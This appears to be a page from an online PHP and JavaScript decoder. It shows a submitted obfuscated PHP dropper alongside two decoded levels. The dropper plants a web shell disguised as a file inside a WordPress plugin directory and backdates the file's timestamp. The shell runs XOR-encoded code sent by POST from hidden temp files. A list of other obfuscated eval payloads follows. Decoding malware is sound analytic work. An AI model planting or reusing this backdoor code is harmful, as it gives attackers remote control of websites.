Online PHP Javascript Script Decoder

Online PHP and Javascript Decoder decode hidden script to uncover its real functionality

Original code:

<?php   $p = "/home1/axnmwdmy/public_html/wp-content/plugins/wpforms-lite/vendor_prefixed/stripe/stripe-php/lib/Exception/OAuth/visualfoxpro.php"; $c = rawurldecode('%3C%3Fphp%0A%0Aif%28isset%28%24_POST%5B%22%5Cx70tr%22%5D%29%20%3F%20true%20%3A%20false%29%7B%0A%09%24comp%20%3D%20hex2bin%28%24_POST%5B%22%5Cx70tr%22%5D%29%3B%0A%09%24obj%20%3D%20%27%27%3B%20for%28%24l%3D0%3B%20%24l%3Cstrlen%28%24comp%29%3B%20%24l%2B%2B%29%7B%24obj%20.%3D%20chr%28ord%28%24comp%5B%24l%5D%29%20%5E%2067%29%3B%7D%0A%09%24resource%20%3D%20array_filter%28%5Bsession_save_path%28%29%2C%20%22/tmp%22%2C%20getenv%28%22TEMP%22%29%2C%20%22/var/tmp%22%2C%20getcwd%28%29%2C%20getenv%28%22TMP%22%29%2C%20%22/dev/shm%22%2C%20ini_get%28%22upload_tmp_dir%22%29%2C%20sys_get_temp_dir%28%29%5D%29%3B%0A%09while%20%28%24parameter_group%20%3D%20array_shift%28%24resource%29%29%20%7B%0A%20%20%20%20%09%09if%20%28max%280%2C%20is_dir%28%24parameter_group%29%20%2A%20is_writable%28%24parameter_group%29%29%29%20%7B%0A%20%20%20%20%24value%20%3D%20%22%24parameter_group%22%20.%20%22/.reference%22%3B%0A%20%20%20%20%24success%20%3D%20file_put_contents%28%24value%2C%20%24obj%29%3B%0Aif%20%28%24success%29%20%7B%0A%09include%20%24value%3B%0A%09%40unlink%28%24value%29%3B%0A%09exit%3B%7D%0A%7D%0A%7D%0A%7D'); if (file_put_contents($p, $c)) {     echo '!success!';     @touch($p, 1705409974); } die('!ended!');

Show other level

Decrypted code level 1:

$p = "/home1/axnmwdmy/public_html/wp-content/plugins/wpforms-lite/vendor_prefixed/stripe/stripe-php/lib/Exception/OAuth/visualfoxpro.php"; $c = raw"if(isset($_POST["\x70tr"]) ? true : false){
	$comp = hex2bin($_POST["\x70tr"]);
	$obj = ''; for($l=0; $l<strlen($comp); $l++){$obj .= chr(ord($comp[$l]) ^ 67);}
	$resource = array_filter([session_save_path(), "/tmp", getenv("TEMP"), "/var/tmp", getcwd(), getenv("TMP"), "/dev/shm", ini_get("upload_tmp_dir"), sys_get_temp_dir()]);
	while ($parameter_group = array_shift($resource)) {
    		if (max(0, is_dir($parameter_group) * is_writable($parameter_group))) {
    $value = "$parameter_group/.reference";
    $success = file_put_contents($value, $obj);
if ($success) {
	include $value;
	@unlink($value);
	exit;}
}
}
}"; if (file_put_contents($p, $c)) {     echo '!success!';     @touch($p, 1705409974); } die('!ended!');

Decrypted code level 2:

$p = "/home1/axnmwdmy/public_html/wp-content/plugins/wpforms-lite/vendor_prefixed/stripe/stripe-php/lib/Exception/OAuth/visualfoxpro.php"; $c = raw"if(isset($_POST["ptr"]) ? true : false){
	$comp = hex2bin($_POST["ptr"]);
	$obj = ''; for($l=0; $l<strlen($comp); $l++){$obj .= chr(ord($comp[$l]) ^ 67);}
	$resource = array_filter([session_save_path(), "/tmp", getenv("TEMP"), "/var/tmp", getcwd(), getenv("TMP"), "/dev/shm", ini_get("upload_tmp_dir"), sys_get_temp_dir()]);
	while ($parameter_group = array_shift($resource)) {
    		if (max(0, is_dir($parameter_group) * is_writable($parameter_group))) {
    $value = "$parameter_group/.reference";
    $success = file_put_contents($value, $obj);
if ($success) {
	include $value;
	@unlink($value);
	exit;}
}
}
}"; if (file_put_contents($p, $c)) {     echo '!success!';     @touch($p, 1705409974); } die('!ended!');

Recent submissions:

eval(base64_decode('Ly8gQ2hlY2sgaWYgdGhlIGN1cnJlbnQgZG9tYWluIGlzIHVzYS5zaG9wY29uc3VsdGluZ3... <?php $p = "/home1/axnmwdmy/public_html/wp-content/plugins/wpforms-lite/vendor_prefixed/... <?php $Z2xBuEt1=array();$Z2xBuEt1[]=8;$Z2xBuEt1[]=3;$Z2xBuEt1[]=8;$Z2xBuEt1[]=19;$Z2xBuEt... <?php // 0xNix Encrypted Code // 2025-11-27 20:48:01 // SPLIT&ENCRYPTed $_d9b848 = 'ba... \x63\x6C\x69\x63\x6B", "\x5B\x64\x61\x74\x61\x2D\x74\x6F\x67\x67\x6C\x65\x3D\x22\x6... \x69\x6D\x67\x2F\x75\x6E\x61\x6D\x75\x6E\x6F\x2F\x42\x49\x4C\x45\x5F\x34\x38\x5F\x43\x75\x... <?php /*67714451e67927784b9b2393235503d9*/ eval(eval(gzinflate(base64_decode('FdU1ssUIgkTR... ?php /*67714451e67927784b9b2393235503d9*/ eval(eval(gzinflate(base64_decode('FdU1ssUIgkTR5... <?php /*67714451e67927784b9b2393235503d9*/ eval(eval(gzinflate(base64_decode(\'FdU1ssUIgkT... \143\155\x64 \143\x6d\144...